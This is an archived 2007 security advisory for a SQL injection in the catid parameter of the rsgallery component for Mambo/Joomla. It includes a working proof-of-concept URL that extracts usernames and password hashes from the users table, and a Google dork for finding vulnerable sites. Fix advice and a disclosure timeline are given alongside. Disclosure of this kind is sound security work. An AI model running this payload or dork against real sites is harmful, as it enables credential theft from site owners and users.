TUCoPS :: Web :: CMS / Portals :: tb13704.htm

Mambo/Joomla Component rsgallery <= 2.0 beta 5 (catid) Remote SQL Injection Vulnerability
Mambo/Joomla Component rsgallery <= 2.0 beta 5 (catid) Remote SQL Injection Vulnerability
Mambo/Joomla Component rsgallery <= 2.0 beta 5 (catid) Remote SQL Injection Vulnerability


ECHO_ADV_86$2007=0D
=0D
-----------------------------------------------------------------------------------------=0D
[ECHO_ADV_86$2007] Mambo/Joomla Component rsgallery <= 2.0 beta 5 (catid) Remote SQL Injection Vulnerability=0D
-----------------------------------------------------------------------------------------=0D
=0D
Author         : M.Hasran Addahroni=0D
Date           : November, 30 th 2007=0D
Location       : Australia, Sydney=0D
Web : http://advisories.echo.or.id/adv/adv86-K-159-2007.txt=0D 
Critical Lvl   : Medium=0D
Impact	       : System access=0D
Where	       : From Remote=0D
---------------------------------------------------------------------------=0D
=0D
Affected software description:=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
Application   : rsgallery  =0D
version       : <= 2.0 beta 5=0D
Vendor : http://www.rsdev.nl/=0D 
Description :=0D
=0D
RSGallery is one of the most complete Gallery solutions for Joomla at this point=0D
=0D
---------------------------------------------------------------------------=0D
=0D
Vulnerability:=0D
~~~~~~~~~~~~~=0D
=0D
Input passed to the "catid" parameter is not properly verified before being used to sql query. =0D
This can be exploited thru the browser and get the hash md5 password from users.=0D
Successful exploitation requires that "magic_quotes" is off.=0D
=0D
=0D
Poc/Exploit:=0D
~~~~~~~~~=0D
=0D
http://target.com/index.php?option=com_rsgallery&page=inline&catid=-1%20union%20select%201,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11%20from%20mos_users--=0D 
=0D
Dork:=0D
~~~~=0D
Google  : "option=com_rsgallery" or inurl:=D3index.php?option=com_rsgallery=D3 =0D
=0D
=0D
=0D
Solution:=0D
~~~~~~=0D
=0D
- Edit the source code to ensure that input is properly verified.=0D
- Turn on magic_quotes in php.ini=0D
- use the latest version=0D
=0D
Timeline:=0D
~~~~~~~~=0D
=0D
- 30 -11 - 2007 bug found=0D
- 3  -12 - 2007 publish advisory=0D
---------------------------------------------------------------------------=0D
=0D
Shoutz:=0D
~~~~=0D
~ ping - my dearest wife, 'zizou' zautha - my lovely son, for all the luv, the tears n the breath=0D
~ y3dips,the_day,m0by,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v, az01,negative,the_hydra,neng chika, str0ke=0D
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,baylaw=0D
~ SinChan,h4ntu,cow_1seng,sakitjiwa, m_beben, rizal, cR4SH3R, madkid, kuntua, stev_manado, nofry,ketut,x16,k1tk4t,cyb3rh3b,opt1lc=0D
~ newbie_hacker@yahoogroups.com=0D 
~ everyone [at] mac.web.id forum=0D
~ #aikmel #e-c-h-o @irc.dal.net=0D 
=0D
---------------------------------------------------------------------------=0D
Contact:=0D
~~~~~=0D
=0D
     K-159 || echo|staff || eufrato[at]gmail[dot]com=0D
Homepage: http://k-159.echo.or.id/=0D 
=0D
-------------------------------- [ EOF ] ----------------------------------

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH